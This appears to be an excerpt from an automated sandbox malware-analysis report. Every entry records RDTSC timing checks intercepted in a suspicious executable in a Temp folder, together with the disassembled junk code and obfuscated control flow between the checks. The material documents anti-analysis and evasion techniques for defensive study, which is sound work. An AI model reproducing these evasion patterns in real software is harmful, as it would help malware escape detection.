                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA745B second address: DA74BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F3430D3497Eh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F3430D34978h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov si, ax 0x00000030 xor dword ptr [ebp+122D1D1Fh], edi 0x00000036 push 00000000h 0x00000038 mov dword ptr [ebp+1246A0A9h], esi 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 xor dword ptr [ebp+122D230Ah], eax 0x00000047 pop esi 0x00000048 push eax 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d pop eax 0x0000004e rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DAB9CC second address: DAB9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DABFDE second address: DABFF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3430D34981h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DACF53 second address: DACF57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DACF57 second address: DACF65 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3430D34976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DADF95 second address: DADF9F instructions: 0x00000000 rdtsc 0x00000002 je 00007F3430D3ED36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DAD094 second address: DAD098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DADF9F second address: DAE047 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F3430D3ED36h 0x00000009 jmp 00007F3430D3ED49h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 jmp 00007F3430D3ED3Fh 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007F3430D3ED38h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F3430D3ED38h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 0000001Ch 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 mov bh, ah 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 pushad 0x00000056 jmp 00007F3430D3ED48h 0x0000005b pushad 0x0000005c popad 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 push ebx 0x00000061 pop ebx 0x00000062 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DAD098 second address: DAD0A2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3430D34976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DAE047 second address: DAE04B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DAD154 second address: DAD15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB0008 second address: DB006F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F3430D3ED38h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 and bh, 00000038h 0x00000025 call 00007F3430D3ED46h 0x0000002a mov ebx, edx 0x0000002c pop edi 0x0000002d clc 0x0000002e push 00000000h 0x00000030 jnl 00007F3430D3ED37h 0x00000036 push 00000000h 0x00000038 xchg eax, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F3430D3ED46h 0x00000040 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB006F second address: DB009C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3430D34978h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F3430D3497Bh 0x00000013 pushad 0x00000014 jmp 00007F3430D34981h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB2124 second address: DB212C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB212C second address: DB2142 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34982h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB2142 second address: DB2162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3430D3ED48h 0x0000000d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB2779 second address: DB27F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3430D34988h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c ja 00007F3430D34982h 0x00000012 jo 00007F3430D3497Ch 0x00000018 jne 00007F3430D34976h 0x0000001e nop 0x0000001f or dword ptr [ebp+122D59D0h], esi 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007F3430D34978h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 0000001Dh 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 jmp 00007F3430D34981h 0x00000046 mov di, ax 0x00000049 push 00000000h 0x0000004b xchg eax, esi 0x0000004c push ecx 0x0000004d pushad 0x0000004e pushad 0x0000004f popad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB27F5 second address: DB2806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F3430D3ED36h 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DAE296 second address: DAE29A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB2806 second address: DB280C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DAF15B second address: DAF15F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB02C4 second address: DB02DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3430D3ED42h 0x00000009 popad 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DAF15F second address: DAF165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB3746 second address: DB374A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DAF165 second address: DAF16F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F3430D34976h 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB374A second address: DB37B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F3430D3ED3Eh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F3430D3ED38h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007F3430D3ED38h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 mov edi, esi 0x00000046 push 00000000h 0x00000048 mov dword ptr [ebp+122D37E0h], ebx 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB37B3 second address: DB37B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB37B7 second address: DB37C1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3430D3ED36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB296A second address: DB2970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB2970 second address: DB2974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB4807 second address: DB4811 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3430D34976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB38F6 second address: DB38FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB4811 second address: DB48A6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F3430D34978h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 sub dword ptr [ebp+122D30F7h], eax 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F3430D34978h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000018h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 mov dword ptr [ebp+122D1E07h], eax 0x0000004b or dword ptr [ebp+122D1FD4h], edx 0x00000051 jmp 00007F3430D34984h 0x00000056 push 00000000h 0x00000058 mov di, 04A5h 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F3430D34988h 0x00000064 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB58C0 second address: DB58C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB68E3 second address: DB68E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB68E7 second address: DB6965 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3430D3ED36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e popad 0x0000000f nop 0x00000010 jmp 00007F3430D3ED46h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F3430D3ED38h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 movsx ebx, bx 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007F3430D3ED38h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 00000019h 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 mov ebx, edx 0x00000052 movsx edi, bx 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jnc 00007F3430D3ED38h 0x0000005e rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB6965 second address: DB696B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB696B second address: DB696F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB9AE9 second address: DB9AEF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB9AEF second address: DB9AF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB9AF5 second address: DB9AF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DBAB71 second address: DBAB76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DBAB76 second address: DBAB7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB6AB1 second address: DB6AB7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB8D01 second address: DB8D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnc 00007F3430D34978h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f ja 00007F3430D3497Bh 0x00000015 push dword ptr fs:[00000000h] 0x0000001c movsx edi, cx 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 mov dword ptr [ebp+122D1F9Fh], ebx 0x0000002c xor dword ptr [ebp+12466C06h], ebx 0x00000032 mov eax, dword ptr [ebp+122D06F1h] 0x00000038 push 00000000h 0x0000003a push edi 0x0000003b call 00007F3430D34978h 0x00000040 pop edi 0x00000041 mov dword ptr [esp+04h], edi 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc edi 0x0000004e push edi 0x0000004f ret 0x00000050 pop edi 0x00000051 ret 0x00000052 mov bx, di 0x00000055 mov ebx, dword ptr [ebp+122D30E3h] 0x0000005b push FFFFFFFFh 0x0000005d movzx edi, cx 0x00000060 nop 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB6AB7 second address: DB6AC1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3430D3ED3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB8D77 second address: DB8D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB6AC1 second address: DB6ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F3430D3ED3Eh 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DBE21C second address: DBE220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DB8D7C second address: DB8D99 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3430D3ED38h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jp 00007F3430D3ED36h 0x00000016 jns 00007F3430D3ED36h 0x0000001c popad 0x0000001d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DBE220 second address: DBE226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DC4EE6 second address: DC4EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DC4EEA second address: DC4F00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3430D3497Eh 0x0000000d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DC4F00 second address: DC4F47 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007F3430D3ED36h 0x00000009 pop esi 0x0000000a jmp 00007F3430D3ED43h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 jmp 00007F3430D3ED43h 0x00000019 pop ebx 0x0000001a jmp 00007F3430D3ED41h 0x0000001f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DC5086 second address: DC508B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DC5343 second address: DC5361 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F3430D3ED42h 0x00000016 js 00007F3430D3ED36h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DC5361 second address: DC5371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F3430D3497Ch 0x0000000a jg 00007F3430D34976h 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DC5371 second address: DC5387 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED41h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DC79CF second address: DC79D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DC79D6 second address: DC79E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F3430D3ED36h 0x0000000d jc 00007F3430D3ED36h 0x00000013 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DCE23E second address: BEECC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3430D34976h 0x0000000a popad 0x0000000b pop edi 0x0000000c add dword ptr [esp], 680F2712h 0x00000013 js 00007F3430D3497Dh 0x00000019 push dword ptr [ebp+122D02E9h] 0x0000001f jno 00007F3430D34981h 0x00000025 jmp 00007F3430D3497Bh 0x0000002a call dword ptr [ebp+122D1DFEh] 0x00000030 pushad 0x00000031 mov dword ptr [ebp+122D2013h], eax 0x00000037 jg 00007F3430D3497Fh 0x0000003d xor eax, eax 0x0000003f mov dword ptr [ebp+122D2013h], eax 0x00000045 mov edx, dword ptr [esp+28h] 0x00000049 mov dword ptr [ebp+122D1DE8h], edi 0x0000004f jmp 00007F3430D34989h 0x00000054 mov dword ptr [ebp+122D3838h], eax 0x0000005a mov dword ptr [ebp+122D1E0Dh], ecx 0x00000060 mov esi, 0000003Ch 0x00000065 or dword ptr [ebp+122D1E3Fh], ecx 0x0000006b jp 00007F3430D3498Fh 0x00000071 jmp 00007F3430D34989h 0x00000076 add esi, dword ptr [esp+24h] 0x0000007a jmp 00007F3430D34981h 0x0000007f lodsw 0x00000081 sub dword ptr [ebp+122D30CDh], edx 0x00000087 add eax, dword ptr [esp+24h] 0x0000008b jmp 00007F3430D34986h 0x00000090 mov ebx, dword ptr [esp+24h] 0x00000094 stc 0x00000095 push eax 0x00000096 push eax 0x00000097 push edx 0x00000098 pushad 0x00000099 jns 00007F3430D34976h 0x0000009f jo 00007F3430D34976h 0x000000a5 popad 0x000000a6 rdtsc
